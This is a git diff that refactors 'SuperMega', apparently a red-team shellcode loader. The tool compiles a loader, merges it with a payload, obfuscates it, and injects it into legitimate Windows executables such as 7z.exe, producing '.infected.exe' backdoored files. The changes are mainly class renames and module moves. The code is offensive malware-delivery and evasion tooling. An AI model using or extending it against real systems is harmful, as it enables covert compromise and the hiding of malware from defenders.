diff --git a/README.md b/README.md index 1587cd3..d22a7e7 100644 --- a/README.md +++ b/README.md @@ -104,6 +104,8 @@ your own shellcode loader. ### Environment Variables +$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin" + Use ``` "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat" diff --git a/helper.py b/helper.py index 505e866..2f88462 100644 --- a/helper.py +++ b/helper.py @@ -5,7 +5,7 @@ import glob import logging from config import config -from defs import * +from model.defs import * logger = logging.getLogger("Helper") diff --git a/defs.py b/model/defs.py similarity index 100% rename from defs.py rename to model/defs.py diff --git a/model.py b/model/exehost.py similarity index 77% rename from model.py rename to model/exehost.py index 16e54bc..ea6ff2c 100644 --- a/model.py +++ b/model/exehost.py @@ -2,9 +2,11 @@ from typing import Dict import logging import pefile +from model.defs import * import pehelper +from peparser.misc import get_physical_address -logger = logging.getLogger("Model") +logger = logging.getLogger("ExeHost") class IatResolve(): @@ -21,21 +23,9 @@ class IatResolve(): self.id ) -def get_physical_address(pe, virtual_address): - # Iterate through the section headers to find which section contains the VA - for section in pe.sections: - # Check if the VA is within the range of this section - if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize: - # Calculate the difference between the VA and the section's virtual address - virtual_offset = virtual_address - section.VirtualAddress - # Add the difference to the section's pointer to raw data - return virtual_offset - #physical_address = section.PointerToRawData + virtual_offset - #return physical_address - return None - -class ExeInfo(): - def __init__(self): +class ExeHost(): + def __init__(self, filepath: FilePath): + self.filepath: FilePath = filepath self.iat_resolves: Dict[str, IatResolve] = {} self.image_base = 0 self.dynamic_base = False @@ -57,12 +47,12 @@ class ExeInfo(): func_name, placeholder, pehelper.get_addr_for(self.iat, func_name)) - def parse_from_exe(self, filepath): - logger.info("--[ Analyzing: {}".format(filepath)) - pe = pefile.PE(filepath) + def init(self): + logger.info("--[ Analyzing: {}".format(self.filepath)) + pe = pefile.PE(self.filepath) if pe.FILE_HEADER.Machine != 0x8664: - raise Exception("Binary is not 64bit: {}".format(filepath)) + raise Exception("Binary is not 64bit: {}".format(self.filepath)) self.ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint self.ep_raw = get_physical_address(pe, self.ep) diff --git a/model/payload.py b/model/payload.py new file mode 100644 index 0000000..c498ebd --- /dev/null +++ b/model/payload.py @@ -0,0 +1,20 @@ +import logging + +from model import * +from model.defs import * + +logger = logging.getLogger("Payload") + +class Payload(): + def __init__(self, filepath: FilePath): + self.payload_path: FilePath = filepath + self.payload_data: bytes = b"" + self.len: int = 0 + + + def init(self): + logging.info("--( Load payload: {}".format(self.payload_path)) + with open(self.payload_path, 'rb') as f: + self.payload_data = f.read() + self.len = len(self.payload_data) + diff --git a/model/project.py b/model/project.py new file mode 100644 index 0000000..63cb346 --- /dev/null +++ b/model/project.py @@ -0,0 +1,21 @@ +import logging + +from model import * +from model.defs import * +from model.payload import Payload +from model.exehost import ExeHost + + +logger = logging.getLogger("Project") + + +class Project(): + def __init__(self, settings): + self.settings = settings + self.payload = Payload(self.settings.payload_path) + self.exe_host = ExeHost(self.settings.inject_exe_in) + + + def init(self): + self.payload.init() + self.exe_host.init() diff --git a/project.py b/model/settings.py similarity index 64% rename from project.py rename to model/settings.py index 30cd8c3..0c8e216 100644 --- a/project.py +++ b/model/settings.py @@ -1,13 +1,11 @@ from model import * -from defs import * +from model.defs import * - -class Project(): +class Settings(): def __init__(self): - # User, generating normally self.payload_path: FilePath = "" - self.payload_data: bytes = b"" + # Settings self.source_style: SourceStyle = SourceStyle.peb_walk self.alloc_style: AllocStyle = AllocStyle.RWX self.exec_style: ExecStyle = ExecStyle.CALL @@ -20,31 +18,15 @@ class Project(): self.inject_mode: int = 2 self.inject_exe_in: FilePath = "" self.inject_exe_out: FilePath = "" - self.exe_info: ExeInfo = None - # debug + # Debug self.show_command_output = False self.verify: bool = False - self.try_start_loader_shellcode: bool = False self.try_start_final_shellcode: bool = False self.try_start_final_infected_exe: bool = False - self.cleanup_files_on_start: bool = True self.cleanup_files_on_exit: bool = True - self.generate_asm_from_c: bool = True self.generate_shc_from_asm: bool = True - - def load_payload(self): - logging.info("--( Load payload: {}".format(self.payload_path)) - with open(self.payload_path, 'rb') as input2: - self.payload_data = input2.read() - - - def load_injectable(self): - logging.info("--( Load injectable: {}".format(self.inject_exe_in)) - self.exe_info = ExeInfo() - self.exe_info.parse_from_exe(self.inject_exe_in) - diff --git a/pehelper.py b/pehelper.py index 61becd0..8088fd8 100644 --- a/pehelper.py +++ b/pehelper.py @@ -5,7 +5,7 @@ from keystone import Ks, KS_ARCH_X86, KS_MODE_64 from capstone import Cs, CS_ARCH_X86, CS_MODE_64 import logging -from defs import * +from model.defs import * logger = logging.getLogger("PEHelper") diff --git a/peparser/misc.py b/peparser/misc.py new file mode 100644 index 0000000..42e5151 --- /dev/null +++ b/peparser/misc.py @@ -0,0 +1,14 @@ + + +def get_physical_address(pe, virtual_address): + # Iterate through the section headers to find which section contains the VA + for section in pe.sections: + # Check if the VA is within the range of this section + if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize: + # Calculate the difference between the VA and the section's virtual address + virtual_offset = virtual_address - section.VirtualAddress + # Add the difference to the section's pointer to raw data + return virtual_offset + #physical_address = section.PointerToRawData + virtual_offset + #return physical_address + return None diff --git a/phases/assembler.py b/phases/assembler.py index e53f3a9..87b17f9 100644 --- a/phases/assembler.py +++ b/phases/assembler.py @@ -17,7 +17,7 @@ def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath, shellcode_out: FileP asm_in, "/link", "/OUT:{}".format(build_exe), - "/entry:AlignRSP" + "/entry:AlignRSP" # "/entry:main", ]) if not os.path.isfile(build_exe): raise Exception("Compiling failed") diff --git a/phases/compiler.py b/phases/compiler.py index 23ef854..91dc4c4 100644 --- a/phases/compiler.py +++ b/phases/compiler.py @@ -166,7 +166,7 @@ def get_function_stubs(asm_in: FilePath): return functions -def fixup_iat_reuse(filename: FilePath, exe_info): +def fixup_iat_reuse(filename: FilePath, exe_host): with open(filename, 'r', encoding='utf-8') as asmfile: lines = asmfile.readlines() @@ -180,7 +180,7 @@ def fixup_iat_reuse(filename: FilePath, exe_info): randbytes: bytes = os.urandom(6) lines[idx] = bytes_to_asm_db(randbytes) + " ; IAT Reuse for {}".format(func_name) lines[idx] += "\n" - exe_info.add_iat_resolve(func_name, randbytes) + exe_host.add_iat_resolve(func_name, randbytes) logger.info(" > Replace func name: {} with {}".format( func_name, randbytes.hex())) diff --git a/phases/injector.py b/phases/injector.py index c68709f..49c5e71 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -4,9 +4,10 @@ import pprint import logging import time import tempfile +import logging from pehelper import * -from model import * +from model.exehost import * from observer import observer from helper import rbrunmode_str from derbackdoorer.derbackdoorer import PeBackdoor @@ -56,17 +57,17 @@ def inject_exe( raise Exception("Shellcode injection error") -def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo): +def injected_fix_iat(exe_out: FilePath, exe_host: ExeHost): """replace IAT in shellcode in code and re-implant it""" # get code section of exe_out code = extract_code_from_exe(exe_out) - for cap in exe_info.get_all_iat_resolvs().values(): + for cap in exe_host.get_all_iat_resolvs().values(): if not cap.id in code: raise Exception("IatResolve ID {} not found, abort".format(cap.id)) off = code.index(cap.id) - current_address = off + exe_info.image_base + exe_info.code_virtaddr + current_address = off + exe_host.image_base + exe_host.code_virtaddr #current_address += 2 destination_address = cap.addr logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( @@ -81,7 +82,7 @@ def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo): write_code_section(exe_file=exe_out, new_data=code) -def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info): +def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_host): data_reuser = DataReuser(exe_path) data_reuser.init() #ret = data_reuser.get_reloc_largest_gap(".rdata") @@ -111,8 +112,8 @@ def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info): f.seek(addr) f.write(var_data) #f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAA") - print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_info.image_base)) - fixup["addr"] = addr + sect.virt_addr + exe_info.image_base - sect.raw_addr + print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_host.image_base)) + fixup["addr"] = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr addr += len(var_data) + 8 #data_reuser.pe.write(exe_path + ".tmp") #data_reuser.pe.close() @@ -125,7 +126,7 @@ def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info): raise Exception("DataResuse: ID {} not found, abort".format(fixup["randbytes"])) off = code.index(fixup["randbytes"]) - current_address = off + exe_info.image_base + exe_info.code_virtaddr + current_address = off + exe_host.image_base + exe_host.code_virtaddr destination_address = fixup["addr"] logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( current_address, destination_address diff --git a/phases/templater.py b/phases/templater.py index 726d4ff..cda8a0f 100644 --- a/phases/templater.py +++ b/phases/templater.py @@ -5,7 +5,7 @@ import logging from helper import * from observer import observer -from defs import * +from model.defs import * use_templates = True logger = logging.getLogger("Assembler") diff --git a/r2helper.py b/r2helper.py index 9f6938c..d7cfb21 100644 --- a/r2helper.py +++ b/r2helper.py @@ -1,7 +1,7 @@ import r2pipe import os -from defs import * +from model.defs import * from helper import hexdump def r2_disas(data: bytes): diff --git a/supermega.py b/supermega.py index 7c04c19..a1281f1 100644 --- a/supermega.py +++ b/supermega.py @@ -5,8 +5,9 @@ from typing import Dict import os import logging import time +import pefile -from defs import * +from model.defs import * from model import * from helper import * from config import config @@ -15,16 +16,18 @@ import phases.compiler import phases.assembler import phases.injector from observer import observer -from project import Project from pehelper import extract_code_from_exe +from model.project import Project +from model.settings import Settings + log_messages = [] def main(): logger.info("Super Mega") config.load() - project = Project() + settings = Settings() parser = argparse.ArgumentParser(description='SuperMega shellcode loader') parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode') @@ -47,57 +50,57 @@ def main(): config.ShowCommandOutput = True if args.verify: - project.payload_path = "shellcodes/createfile.bin" - project.verify = True + settings.payload_path = "shellcodes/createfile.bin" + settings.verify = True - project.try_start_final_infected_exe = False - project.try_start_final_shellcode = False + settings.try_start_final_infected_exe = False + settings.try_start_final_shellcode = False if args.verify == "peb": - project.inject = True - project.inject_mode = 2 - project.inject_exe_in = "exes/7z.exe" - project.inject_exe_out = "out/7z-verify.exe" + settings.inject = True + settings.inject_mode = 2 + settings.inject_exe_in = "exes/7z.exe" + settings.inject_exe_out = "out/7z-verify.exe" elif args.verify == "iat": - project.inject = True - project.inject_mode = 1 # 2 - project.inject_exe_in = "exes/procexp64.exe" - project.inject_exe_out = "out/procexp64-verify.exe" + settings.inject = True + settings.inject_mode = 1 # 2 + settings.inject_exe_in = "exes/procexp64.exe" + settings.inject_exe_out = "out/procexp64-verify.exe" elif args.verify == "rwx": - project.inject = True - project.inject_mode = 1 # ,2 is broken atm - project.inject_exe_in = "exes/wifiinfoview.exe" - project.inject_exe_out = "out/wifiinfoview.exe-verify.exe" + settings.inject = True + settings.inject_mode = 1 # ,2 is broken atm + settings.inject_exe_in = "exes/wifiinfoview.exe" + settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe" else: logger.info("Unknown verify option {}, use std/iat".format(args.verify)) return else: - project.try_start_final_infected_exe = args.start_injected - project.try_start_final_shellcode = args.start_final_shellcode - project.try_start_loader_shellcode = args.start_loader_shellcode + settings.try_start_final_infected_exe = args.start_injected + settings.try_start_final_shellcode = args.start_final_shellcode + settings.try_start_loader_shellcode = args.start_loader_shellcode - project.cleanup_files_on_start = not args.no_clean_at_start - project.cleanup_files_on_exit =not args.no_clean_at_exit + settings.cleanup_files_on_start = not args.no_clean_at_start + settings.cleanup_files_on_exit =not args.no_clean_at_exit if args.short_call_patching: - project.short_call_patching = True + settings.short_call_patching = True if args.alloc: if args.alloc == "rwx_1": - project.alloc_style = AllocStyle.RWX + settings.alloc_style = AllocStyle.RWX if args.decoder: if args.decoder == "plain_1": - project.decoder_style = DecoderStyle.PLAIN_1 + settings.decoder_style = DecoderStyle.PLAIN_1 elif args.decoder == "xor_1": - project.decoder_style = DecoderStyle.XOR_1 + settings.decoder_style = DecoderStyle.XOR_1 if args.exec: if args.exec == "direct_1": - project.exec_style = ExecStyle.CALL + settings.exec_style = ExecStyle.CALL if args.rbrunmode: if args.rbrunmode == "1" or args.rbrunmode == "2": - project.inject_mode = int(args.rbrunmode) + settings.inject_mode = int(args.rbrunmode) else: logging.error("Invalid mode, use one of:") for i in ["1", "2"]: @@ -113,16 +116,16 @@ def main(): if not os.path.isfile(args.shellcode): logger.info("Could not find: {}".format(args.shellcode)) return - project.payload_path = args.shellcode + settings.payload_path = args.shellcode if args.inject: if not os.path.isfile(args.inject): logger.info("Could not find: {}".format(args.inject)) return - project.inject = True - project.inject_exe_in = args.inject - project.inject_exe_out = args.inject.replace(".exe", ".infected.exe") + settings.inject = True + settings.inject_exe_in = args.inject + settings.inject_exe_out = args.inject.replace(".exe", ".infected.exe") - start(project) + start(settings) def get_physical_address(pe, virtual_address): # Iterate through the section headers to find which section contains the VA @@ -137,88 +140,88 @@ def get_physical_address(pe, virtual_address): #return physical_address return None -def start(project: Project): +def start(settings: Settings): # Delete: all old files - if project.cleanup_files_on_start: + if settings.cleanup_files_on_start: clean_files() delete_all_files_in_directory("logs/") # Load our input - project.load_payload() - project.load_injectable() + project = Project(settings) + project.init() # Copy: IAT_REUSE loader C files into working directory: build/ phases.templater.create_c_from_template( source_style = SourceStyle.iat_reuse, - alloc_style = project.alloc_style, - exec_style = project.exec_style, - decoder_style= project.decoder_style, - payload_len = len(project.payload_data), + alloc_style = settings.alloc_style, + exec_style = settings.exec_style, + decoder_style= settings.decoder_style, + payload_len = project.payload.len, ) # Compile: IAT_REUSE loader C -> ASM - if project.generate_asm_from_c: + if settings.generate_asm_from_c: phases.compiler.compile( c_in = main_c_file, asm_out = main_asm_file, - payload_len = len(project.payload_data), - short_call_patching = project.short_call_patching) + payload_len = project.payload.len, + short_call_patching = project.settings.short_call_patching) # Decide if we can use IAT_REUSE (all function calls available as import) required_functions = phases.compiler.get_function_stubs(main_asm_file) - if project.exe_info.has_all_functions(required_functions): - project.source_style = SourceStyle.iat_reuse + if project.exe_host.has_all_functions(required_functions): + settings.source_style = SourceStyle.iat_reuse logger.warning("--[ SourceStyle: Using IAT_REUSE".format()) # all good, patch ASM - phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_info) + phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_host) observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file)) else: # Not good, Fall back to PEB_WALK - project.source_style = SourceStyle.peb_walk + settings.source_style = SourceStyle.peb_walk logger.warning("--[ SourceStyle: Fall back to PEB_WALK".format()) observer.clean_files() clean_files() # Copy: PEB_WALK loader C files into working directory: build/ phases.templater.create_c_from_template( source_style = SourceStyle.peb_walk, - alloc_style = project.alloc_style, - exec_style = project.exec_style, - decoder_style= project.decoder_style, - payload_len = len(project.payload_data), + alloc_style = settings.alloc_style, + exec_style = settings.exec_style, + decoder_style= settings.decoder_style, + payload_len = project.payload.len, ) # Compile: PEB_WALK C -> ASM - if project.generate_asm_from_c: + if settings.generate_asm_from_c: phases.compiler.compile( c_in = main_c_file, asm_out = main_asm_file, - payload_len = len(project.payload_data)) + payload_len = project.payload.len) observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file)) # Assemble: ASM -> Shellcode - if project.generate_shc_from_asm: + if settings.generate_shc_from_asm: phases.assembler.asm_to_shellcode( asm_in = main_asm_file, build_exe = main_exe_file, shellcode_out = main_shc_file) # Try: Starting the loader-shellcode (rarely useful) - if project.try_start_loader_shellcode: + if settings.try_start_loader_shellcode: try_start_shellcode(main_shc_file) # Merge: shellcode/loader with payload - if project.dataref_style == DataRefStyle.APPEND: + if settings.dataref_style == DataRefStyle.APPEND: phases.assembler.merge_loader_payload( shellcode_in = main_shc_file, shellcode_out = main_shc_file, - payload_data = project.payload_data, - decoder_style = project.decoder_style) + payload_data = project.payload.payload_data, + decoder_style = settings.decoder_style) - if project.verify and project.source_style == SourceStyle.peb_walk: + if settings.verify and settings.source_style == SourceStyle.peb_walk: logger.info("--[ Verify final shellcode") if not verify_shellcode(main_shc_file): logger.info("Could not verify, still continuing") #return - if project.try_start_final_shellcode: + if settings.try_start_final_shellcode: logger.info("--[ Test Append shellcode") try_start_shellcode(main_shc_file) @@ -226,9 +229,9 @@ def start(project: Project): shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file))) # RWX Injection - if project.exe_info.rwx_section != None: + if project.exe_host.rwx_section != None: logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format( - project.exe_info.rwx_section.Name.decode().rstrip('\x00') + project.exe_host.rwx_section.Name.decode().rstrip('\x00') )) obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn") observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn")) @@ -236,33 +239,33 @@ def start(project: Project): # inject merged loader into an exe exit_code = 0 - if project.inject: + if settings.inject: l = len(file_readall_binary(main_shc_file)) - if l + 128 > project.exe_info.code_size: + if l + 128 > project.exe_host.code_size: logger.error("Error: Shellcode {}+128 too small for target code section {}".format( - l, project.exe_info.code_size + l, project.exe_host.code_size )) return phases.injector.inject_exe( shellcode_in = main_shc_file, - exe_in = project.inject_exe_in, - exe_out = project.inject_exe_out, - inject_mode = project.inject_mode, + exe_in = settings.inject_exe_in, + exe_out = settings.inject_exe_out, + inject_mode = settings.inject_mode, ) - if project.source_style == SourceStyle.iat_reuse: + if settings.source_style == SourceStyle.iat_reuse: phases.injector.injected_fix_iat( - project.inject_exe_out, project.exe_info) + settings.inject_exe_out, project.exe_host) # TODO IF? phases.injector.injected_fix_data( - project.inject_exe_out, + settings.inject_exe_out, config.data_fixups, config.data_fixup_entries, - project.exe_info) + project.exe_host) - code = extract_code_from_exe(project.inject_exe_out) - pe = pefile.PE(project.inject_exe_out) + code = extract_code_from_exe(settings.inject_exe_out) + pe = pefile.PE(settings.inject_exe_out) ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint ep_raw = get_physical_address(pe, ep) pe.close() @@ -273,18 +276,18 @@ def start(project: Project): code[ep_raw:ep_raw+300]) - if project.verify: + if settings.verify: logger.info("--[ Verify infected exe") - exit_code = phases.injector.verify_injected_exe(project.inject_exe_out) + exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out) - elif project.try_start_final_infected_exe: - logger.info("--[ Start infected exe: {}".format(project.inject_exe_out)) + elif settings.try_start_final_infected_exe: + logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out)) run_process_checkret([ - project.inject_exe_out, + settings.inject_exe_out, ], check=False) # Cleanup files - if project.cleanup_files_on_exit: + if settings.cleanup_files_on_exit: clean_files() # write log to file diff --git a/tests/test_asm.py b/tests/test_asm.py index 0a666ee..972b8f4 100644 --- a/tests/test_asm.py +++ b/tests/test_asm.py @@ -4,8 +4,8 @@ import unittest import logging from phases.compiler import fixup_asm_file, fixup_iat_reuse -from model import ExeInfo -from defs import * +from model.exehost import ExeHost +from model.defs import * from observer import observer @@ -44,15 +44,15 @@ class AsmTest(unittest.TestCase): path_working: FilePath = "tests/data/iat_reuse_pre_fixup.asm.test" shutil.copy(path_in, path_working) - exe_info = ExeInfo() + exe_host = ExeHost() - fixup_iat_reuse(path_working, exe_info) - self.assertTrue(len(exe_info.iat_resolves), 2) + fixup_iat_reuse(path_working, exe_host) + self.assertTrue(len(exe_host.iat_resolves), 2) - self.assertTrue("GetEnvironmentVariableW" in exe_info.iat_resolves) - self.assertEqual(exe_info.iat_resolves["GetEnvironmentVariableW"].name, "GetEnvironmentVariableW") - self.assertEqual(exe_info.iat_resolves["GetEnvironmentVariableW"].addr, 0) - self.assertTrue(len(exe_info.iat_resolves["GetEnvironmentVariableW"].id), 6) # 6 random bytes + self.assertTrue("GetEnvironmentVariableW" in exe_host.iat_resolves) + self.assertEqual(exe_host.iat_resolves["GetEnvironmentVariableW"].name, "GetEnvironmentVariableW") + self.assertEqual(exe_host.iat_resolves["GetEnvironmentVariableW"].addr, 0) + self.assertTrue(len(exe_host.iat_resolves["GetEnvironmentVariableW"].id), 6) # 6 random bytes with open(path_working, "r") as f: lines = f.readlines() diff --git a/tests/test_datareuse.py b/tests/test_datareuse.py index 0f310d2..306ee62 100644 --- a/tests/test_datareuse.py +++ b/tests/test_datareuse.py @@ -3,11 +3,6 @@ from typing import List import unittest import logging -from model import ExeInfo -from defs import * -from helper import hexdump -from observer import observer - from phases.datareuse import * @@ -69,7 +64,7 @@ class DataReuseTest(unittest.TestCase): fixup = data_fixups[0] self.assertTrue(fixup["string_ref"], "rcx") self.assertTrue(fixup["register"], "$SG72513") - self.assertEqual(5, len(fixup["randbytes"])) + self.assertEqual(7, len(fixup["randbytes"])) # needs to be 7! asmFileParser.write_lines_to(asm_out) diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py index 001f474..02e5454 100644 --- a/tests/test_derbackdoorer.py +++ b/tests/test_derbackdoorer.py @@ -3,8 +3,8 @@ from typing import List import unittest import logging -from model import ExeInfo -from defs import * +from model.exehost import ExeHost +from model.defs import * from pehelper import extract_code_from_exe from helper import hexdump from observer import observer